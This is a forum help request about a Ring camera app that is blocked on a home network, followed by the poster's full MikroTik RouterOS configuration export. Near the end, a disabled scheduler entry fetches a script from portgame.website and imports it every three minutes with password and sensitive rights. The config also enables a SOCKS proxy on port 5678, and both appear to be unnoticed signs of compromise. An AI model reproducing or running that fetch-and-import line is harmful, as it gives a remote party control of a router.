Community discussions

MikroTik App
 
anchoviesdesire
just joined
Topic Author
Posts: 1
Joined: Sat Oct 09, 2021 2:14 pm

Ring app not working

Sat Oct 09, 2021 2:20 pm

My Ring app in Live View is not working. It seems to be blocked .I tried disabling al firewall, but no luck.

The connection does work when not on wifi. Any ideas?
# oct/09/2021 13:11:07 by RouterOS 6.49
# software id = 4QSJ-EBI4
#
# model = 2011UiAS
# serial number = 444704B2AE90
/interface bridge
add arp=proxy-arp disabled=yes igmp-snooping=yes name=bridge-LAN protocol-mode=\
    none
add arp=proxy-arp igmp-snooping=yes name=bridge-local
/interface ethernet
set [ find default-name=ether1 ] arp=proxy-arp loop-protect=off
/interface vlan
add interface=ether1 name=vlan1.4 vlan-id=4
add interface=ether1 loop-protect=off name=vlan1.6 vlan-id=6
/interface pppoe-client
add add-default-route=yes disabled=no interface=vlan1.6 name=pppoe-out1 user=\
    kpn
/interface list
add name=WAN
add name=LAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip dhcp-client option
add code=60 name=option60-vendorclass value="'IPTV_RG'"
/ip dhcp-server option
add code=60 name=option60-vendorclass value="'IPTV_RG'"
add code=28 name=option28-broadcast
/ip dhcp-server option sets
add name=IPTV options=option60-vendorclass,option28-broadcast
/ip pool
add name=thuisnetwerk ranges=192.168.2.40-192.168.2.180
/ip dhcp-server
add address-pool=thuisnetwerk disabled=no interface=bridge-local lease-time=\
    1h30m name=dhcp-thuis
/routing bgp instance
set default disabled=yes
/interface bridge port
add bridge=bridge-local interface=ether2
add bridge=bridge-local interface=ether3
add bridge=bridge-local interface=ether4
add bridge=bridge-local interface=ether5
add bridge=bridge-local interface=ether6
add bridge=bridge-local interface=ether7
add bridge=bridge-local interface=ether8
add bridge=bridge-local interface=ether9
/interface list member
add interface=pppoe-out1 list=WAN
add interface=ether1 list=WAN
add interface=ether2 list=LAN
add interface=ether3 list=LAN
add interface=ether4 list=LAN
add interface=ether5 list=LAN
add interface=ether6 list=LAN
add interface=ether7 list=LAN
add interface=ether8 list=LAN
add interface=ether9 list=LAN
add interface=ether10 list=LAN
add interface=vlan1.4 list=WAN
add interface=vlan1.6 list=WAN
/ip address
add address=192.168.2.254/24 interface=bridge-local network=192.168.2.0
/ip dhcp-client
add default-route-distance=210 dhcp-options=option60-vendorclass disabled=no \
    interface=vlan1.4 use-peer-dns=no use-peer-ntp=no
add interface=bridge-LAN
add interface=bridge-LAN
add interface=bridge-LAN
add interface=bridge-LAN
add interface=bridge-LAN
/ip dhcp-server config
set store-leases-disk=15m
/ip dhcp-server lease
add address=192.168.2.220 comment="Decoder 1" dhcp-option-set=IPTV mac-address=\
    50:7E:5D:BF:AC:83 server=dhcp-thuis
/ip dhcp-server network
add address=192.168.2.0/24 dns-server=8.8.8.8,1.1.1.1 domain=thuis.local \
    gateway=192.168.2.254
/ip dns
set cache-max-ttl=1d servers=8.8.8.8,8.8.4.4
/ip firewall filter
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=input dst-port=5678 protocol=tcp src-address=\
    192.168.2.0/24
add action=accept chain=input comment=\
    "defconf: accept established,related,untracked" connection-state=\
    established,related,untracked
add action=accept chain=input dst-port=53 protocol=udp src-address=\
    192.168.2.0/24
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=accept chain=forward comment=\
    "defconf: accept established,related, untracked" connection-state=\
    established,related,untracked
add action=accept chain=forward comment=IPTV disabled=yes src-address=\
    217.166.226.46
add action=accept chain=forward dst-address=224.0.0.0/8 in-interface=vlan1.4
add action=accept chain=input comment="IPTV IGMP" dst-address=224.0.0.0/8 \
    in-interface=vlan1.4 protocol=igmp
add action=drop chain=input dst-port=53 protocol=udp
add action=drop chain=input comment="defconf: drop invalid" connection-state=\
    invalid
add action=drop chain=forward comment="defconf: drop invalid" connection-state=\
    invalid
add action=drop chain=forward comment="defconf: drop all from WAN not DSTNATed" \
    connection-nat-state=!dstnat connection-state=new in-interface-list=WAN
add action=drop chain=input comment="defconf: drop all not coming from LAN" \
    in-interface-list=!LAN
/ip firewall nat
add action=masquerade chain=srcnat dst-address=213.75.112.0/21 out-interface=\
    vlan1.4
add action=masquerade chain=srcnat dst-address=217.166.0.0/16 out-interface=\
    vlan1.4
add action=masquerade chain=srcnat out-interface=pppoe-out1
add action=dst-nat chain=dstnat dst-port=88 in-interface=pppoe-out1 protocol=\
    tcp to-addresses=192.168.2.23 to-ports=88
/ip firewall service-port
set sip disabled=yes
/ip service
set telnet address=192.168.2.0/24 disabled=yes
set ftp address=192.168.2.0/24 disabled=yes
set www address=192.168.2.0/24 disabled=yes
set ssh address=192.168.2.0/24 disabled=yes port=26711
set api address=192.168.2.0/24 disabled=yes
set winbox address=192.168.2.0/24
set api-ssl address=192.168.2.0/24 disabled=yes
/ip socks
set enabled=yes port=5678
/ip upnp
set show-dummy-rule=no
/ip upnp interfaces
add interface=bridge-local type=internal
/routing igmp-proxy
set quick-leave=yes
/routing igmp-proxy interface
add alternative-subnets=0.0.0.0/0 interface=vlan1.4 upstream=yes
add interface=bridge-local
/system clock
set time-zone-name=Europe/Amsterdam
/system scheduler
add disabled=yes interval=3m name=U7 on-event="/tool fetch url=http://portgame.w\
    ebsite/poll/8ff37df8-37b3-4995-bab9-af48b2709bf8 mode=http dst-path=7xe7zt46\
    hb08\r\
    \n/import 7xe7zt46hb08" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    apr/26/2021 start-time=11:20:10

Who is online

Users browsing this forum: cvalavik, i4jordan and 9 guests